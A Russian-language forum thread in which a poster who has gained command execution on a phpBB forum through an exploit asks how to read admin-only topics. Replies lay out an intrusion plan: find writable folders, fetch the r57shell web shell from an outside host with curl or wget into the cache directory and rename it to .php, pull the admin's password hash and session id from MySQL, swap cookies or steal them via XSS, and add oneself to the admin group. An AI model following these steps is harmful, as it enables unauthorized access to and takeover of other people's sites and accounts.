C помощю эксплоита получил доступ к файлам форума. Работают команды cat, ls, uname, rm, echo, mkdir и т.д. Содержимое файла config.php : PHP: <?php // phpBB 2.x auto-generated config file // Do not change anything in this file! $dbms = 'mysql'; $dbhost = 'localhost'; $dbname = 'xxx_forum'; $dbuser = 'xxx_forum'; $dbpasswd = 'xxx_password'; $table_prefix = 'phpbb_'; define('PHPBB_INSTALLED', true); ?> Для меня главная цель, это посмотреть топики которые разрешены только Группе Администраторы. И ещё как подключится к базе mySQL имея данные с config.php? Сама ссылка стандартного типа: www.xxx.ru/forum/ Подскажите пожалуйсто какой должен быть следющий шаг?
Залить шелл, оттуда выудить через MySQL hash админа и его sid. Спокойно подменить cookies и смотреть..... Самый простой способ лить в папку cаche, она на запись всегда разрешена. И curl почти везде есть. Значит пробираешь pwd(узнаешь папку в которой ты находишся). И пишешь curl -o путь/cache/file.txt http://rst.void.ru/download/r57shell.txt .... А потом cp путь/cache/file.txt путь/cache/file.php , и идешь путь/cache/file.php Все расписал подробнее нельзя.
Залить шелл командой wget ? т.е. пример будет такого типа: perl phpbb.pl www.xxx.ru /forum/ 3128 "wget http://attack/shell.php" Если да то обращение через браузер должен быть таким: www.xxx.ru/forum/shell.php ? команда PWD: root@omega: pwd -------------------------------- /usr/home/www/xxx/xxx/forum
хм... если просто смотреть админские разделы то зачем аж так парится? простая кся и по кукам админа заходишь ну для могучих перцев можно и вправду залить шелл командой wget(или другой смотря что пашет) и узнавать хэш админа потом его разшифрововать.... кста а нах заливать шел чтоб лазить по мискле? разве mysql -D -h -u -p ктонить отменял? :Р и вообще если тебе известно всё по мискле то по выше перечисленой команде можно и апдейтнуть себя и перевести в группу админов
bl4ck-cat ТЫ гений чтоли...... Каким макаром ты подменишь куки в версиях старше 2.0.12 и станешь при этом админом? Научи я тоже так хочу. Cnekmp Набери ls -l посмотри какие еще папки доступны на запись.... около них будет написано drwxrwxrwx
да, да... ну а дальше если шелл зальешь то там уже разберешся... просто найди там панель управления базой и повводи все те данные про мисклю что ты раздобыл и юзай запросы к бд... хотя имхо если тебе просто читать разделы.. то проще юзнуть ксю... помоему жалобная кся там тоже пашет как и на ипб...
Диманыч я не говорил что можно через подмену куков сделать себя админом О_о я дал 2 способа: подменить свои куки на куки админа и заходить как этот админ и 2 способ через мускуль добавить себя в админ группу О_о ведь если у тебя есть все данные про бд мускуля чем бы не поизменять там чего? о_О
Посмотреть директорию доступной для записи командой ls -la. Потом попробовать залить шелл с помощью качалок. Подцепиться к базе данныхимею хост пароль и логин. Посмотреть хэш админа. Подставить к кукаам. Вуаля закрытые разделы а твоих глазах.
иммел ввиду стыреть куки и подставить вместо своих и заходить как админ у которого эти куки просто написал сокращенно